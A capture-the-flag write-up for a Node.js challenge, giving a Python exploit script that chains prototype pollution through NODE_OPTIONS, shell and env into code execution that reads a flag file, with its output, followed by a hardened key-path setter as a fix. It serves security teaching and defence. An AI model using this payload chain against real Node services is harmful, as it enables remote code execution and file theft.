Poison
Structure
poison
├── src/
│   ├── controllers/
│   │   ├── date.js
│   │   └── services.js
│   ├── data/
│   │   └── services.json
│   ├── middlewares/
│   │   └── error.js
│   ├── routes/
│   │   ├── date.json
│   │   └── services.js
│   ├── utils/
│   │   └── utils.js
│   ├── app.js
│   ├── flag.txt
│   └── package.json
├── .dockerignore
├── Dockerfile
├── entrypoint.sh
└── restart.sh
Solution
Install pip
sudo apt install python3-pip
Install requests
python3 -m pip install requests
Exploit
from requests import get, put

host = '127.0.0.1'
port = '8003'

# Each PUT goes through the app's key-path setter. The path
# constructor/prototype/<key> walks from a plain object onto
# Object.prototype, so the value is written there (prototype pollution)
# and later read back as an option by the child process spawned by /api/date.

# 1. NODE_OPTIONS: every node process started by the app will preload
#    /proc/self/environ as if it were a module.
nodeOpt = {
    'url': f'http://{host}:{port}/api/tcc/constructor/prototype/NODE_OPTIONS',
    'payload': { 'value': '--require /proc/self/environ' }
}

# 2. shell: run the spawned command through node rather than /bin/sh.
shell = {
    'url': f'http://{host}:{port}/api/tcc/constructor/prototype/shell',
    'payload': { 'value': 'node' }
}

# 3. env: the environment the child inherits. The EXPLOIT variable is
#    written into /proc/self/environ, where it parses as JS that reads the
#    flag and throws it so it appears in the error output.
env = {
    'url': f'http://{host}:{port}/api/tcc/constructor/prototype/env',
    'payload': { 'value': { 'EXPLOIT': "'';throw new Error(require('fs').readFileSync('/usr/src/app/flag.txt'));//" } }
}

# The endpoint whose handler spawns the child process with the polluted options.
date = {
    'url': f'http://{host}:{port}/api/date'
}

put(nodeOpt['url'], json = nodeOpt['payload'])
put(shell['url'], json = shell['payload'])
put(env['url'], json = env['payload'])
response = get(date['url'])
print(response.text)
Run the script
python3 exploit.py
Output
EXPLOIT='';throw new Error(require('fs').readFileSync('/usr/src/app/flag.txt'));//
                 ^

Error: TCC{j5_pR0707yp3_p0150n1Ng}
    at Object.<anonymous> (/proc/30/environ:1:18)
    at Module._compile (internal/modules/cjs/loader.js:1085:14)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
    at Module.load (internal/modules/cjs/loader.js:950:32)
    at Function.Module._load (internal/modules/cjs/loader.js:790:12)
    at Module.require (internal/modules/cjs/loader.js:974:19)
    at Module._preloadModules (internal/modules/cjs/loader.js:1244:12)
    at loadPreloadModules (internal/bootstrap/pre_execution.js:475:5)
    at prepareMainThreadExecution (internal/bootstrap/pre_execution.js:72:3)
    at internal/main/check_syntax.js:24:1
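Fix

The root cause is a key-path setter that happily walks `constructor` then `prototype` and lands on `Object.prototype`. The following is an added example, not code from the writeup or from the challenge source: a naive setter that behaves the way the `/api/tcc/constructor/prototype/...` route does, next to a hardened version that rejects prototype-reaching keys and stores data in null-prototype objects. The function names, the `/api/tcc/` prefix handling and the sample paths are assumptions about the challenge code.

```javascript
'use strict';

// Keys that let a path climb from a plain object onto Object.prototype.
// Blocking all three closes the constructor -> prototype route used in
// the exploit as well as the direct __proto__ route.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Turn "/api/tcc/constructor/prototype/shell" into
// ["constructor", "prototype", "shell"]. The prefix comes from the writeup;
// how the challenge actually parses it is an assumption.
function parseKeyPath(urlPath, prefix = '/api/tcc/') {
  if (!urlPath.startsWith(prefix)) throw new Error('unexpected route prefix');
  return urlPath.slice(prefix.length).split('/').map(decodeURIComponent).filter(Boolean);
}

// Vulnerable pattern: walk the path, creating objects as needed, and assign.
// On any plain object, ["constructor", "prototype", "x"] resolves to
// Object.prototype, so the write becomes visible on every object afterwards.
function naiveSet(root, keyPath, value) {
  let node = root;
  for (const key of keyPath.slice(0, -1)) {
    if (node[key] === undefined) node[key] = {};
    node = node[key];
  }
  node[keyPath[keyPath.length - 1]] = value;
  return root;
}

// Hardened pattern: refuse prototype-reaching keys, descend only through own
// properties, and allocate null-prototype containers so a missing key can
// never be resolved through the prototype chain.
function safeSet(root, keyPath, value) {
  if (keyPath.length === 0) throw new Error('empty key path');
  for (const key of keyPath) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`rejected key "${key}"`);
  }
  let node = root;
  for (const key of keyPath.slice(0, -1)) {
    if (!Object.prototype.hasOwnProperty.call(node, key)) {
      node[key] = Object.create(null);
    }
    node = node[key];
    if (node === null || typeof node !== 'object') {
      throw new Error(`cannot descend into non-object at "${key}"`);
    }
  }
  node[keyPath[keyPath.length - 1]] = value;
  return root;
}

// Probe: is `name` reachable on a brand-new object that never set it?
// A true result means Object.prototype has been polluted.
function isGloballyPolluted(name) {
  return name in {};
}

// Replays the writeup's "shell" request against both setters and reports
// the outcome. The naive pollution is deleted again so the process stays usable.
function demonstrate() {
  const keyPath = parseKeyPath('/api/tcc/constructor/prototype/shell');
  const result = {};

  naiveSet({}, keyPath, 'node');
  result.naivePolluted = isGloballyPolluted('shell');
  delete Object.prototype.shell; // undo the pollution for the rest of the run

  let rejected = false;
  try {
    safeSet({}, keyPath, 'node');
  } catch (e) {
    rejected = true;
  }
  result.safeRejected = rejected;
  result.safeStillClean = !isGloballyPolluted('shell');

  // A legitimate nested write still works with the hardened setter.
  const store = safeSet(Object.create(null), ['settings', 'timezone'], 'UTC');
  result.safeStored = store.settings.timezone;
  return result;
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(demonstrate());
}
```

Rejecting the three keys is the cheap fix; the null-prototype container is what makes the setter safe even if another key is found later. Independently of the setter, spawning a child process with options pulled from a plain object is what turned the pollution into code execution, so building the `child_process` options from explicit, known values rather than a mutable object closes that half too.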